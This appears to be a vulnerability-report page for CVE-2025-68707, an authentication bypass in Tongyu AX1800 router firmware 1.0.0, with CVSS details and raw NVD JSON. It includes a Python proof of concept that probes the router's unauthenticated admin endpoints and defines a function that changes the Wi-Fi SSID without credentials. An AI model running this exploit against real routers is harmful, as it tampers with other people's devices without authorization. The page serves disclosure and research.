Security Vulnerability Report
中文
CVE-2025-68707 CVSS 8.8 HIGH

CVE-2025-68707

Published: 2026-01-13 17:15:59
Last Modified: 2026-02-13 20:52:01
Source: [email protected]

Description

An authentication bypass vulnerability in the Tongyu AX1800 Wi-Fi 6 Router with firmware 1.0.0 allows unauthenticated network-adjacent attackers to perform arbitrary configuration changes without providing credentials, as long as a valid admin session is active. This can result in full compromise of the device (i.e., via unauthenticated access to /boaform/formSaveConfig and /boaform/admin endpoints).

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tycc:tongyu_ax1800_firmware:1.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tycc:tongyu_ax1800:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tongyu AX1800 Wi-Fi 6 Router 固件 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-68707 PoC - Tongyu AX1800 Authentication Bypass Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys from urllib.parse import urljoin def check_vulnerability(target_ip): """ Check if target is vulnerable to CVE-2025-68707 """ base_url = f"http://{target_ip}" # Vulnerable endpoints endpoints = [ "/boaform/formSaveConfig", "/boaform/admin" ] print(f"[*] Testing target: {target_ip}") print(f"[*] CVE-2025-68707 - Tongyu AX1800 Auth Bypass") for endpoint in endpoints: url = urljoin(base_url, endpoint) try: # Attempt unauthenticated request response = requests.get(url, timeout=5) print(f"[+] Endpoint {endpoint}: Status {response.status_code}") # Check for admin interface access without auth if response.status_code == 200: # Check if response contains admin interface elements if any(keyword in response.text.lower() for keyword in ['admin', 'configuration', 'save', 'wireless', 'password']): print(f"[!] VULNERABLE: {endpoint} accessible without authentication!") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def exploit_configuration_change(target_ip, new_ssid="HackedNetwork"): """ Exploit: Change wireless SSID without authentication """ base_url = f"http://{target_ip}" # Payload to change wireless configuration payload = { 'ssid': new_ssid, 'save': 'Save' } print(f"[*] Attempting to change SSID to: {new_ssid}") try: response = requests.post( urljoin(base_url, "/boaform/formSaveConfig"), data=payload, timeout=5 ) if response.status_code == 200: print(f"[+] Configuration change request sent") print(f"[!] Target may be vulnerable - request processed without auth") return True except requests.RequestException as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68707.py <target_ip>") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68707", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:59.197", "lastModified": "2026-02-13T20:52:01.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability in the Tongyu AX1800 Wi-Fi 6 Router with firmware 1.0.0 allows unauthenticated network-adjacent attackers to perform arbitrary configuration changes without providing credentials, as long as a valid admin session is active. This can result in full compromise of the device (i.e., via unauthenticated access to /boaform/formSaveConfig and /boaform/admin endpoints)."}, {"lang": "es", "value": "Una vulnerabilidad de omisión de autenticación en el router Wi-Fi 6 Tongyu AX1800 con firmware 1.0.0 permite a atacantes no autenticados adyacentes a la red realizar cambios de configuración arbitrarios sin proporcionar credenciales, siempre que una sesión de administrador válida esté activa. Esto puede resultar en un compromiso total del dispositivo (es decir, a través de acceso no autenticado a los endpoints /boaform/formSaveConfig y /boaform/admin)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tycc:tongyu_ax1800_firmware:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "99FC1171-C2F1-48FC-8A20-63990BF44F8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tycc:tongyu_ax1800:-:*:*:*:*:*:*:*", "matchCriteriaId": "CA5C95D6-8960-4FD1-99AD-CD3880310AA4"}]}]}], "references": [{"url": "https://github.com/actuator/cve/blob/main/Tongyu/CVE-2025-68707.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/actuator/cve/tree/main/Tongyu", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.tongyucom.com/product/ax1800.html", "source": "[email protected]", "tags": ["Broken Link"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.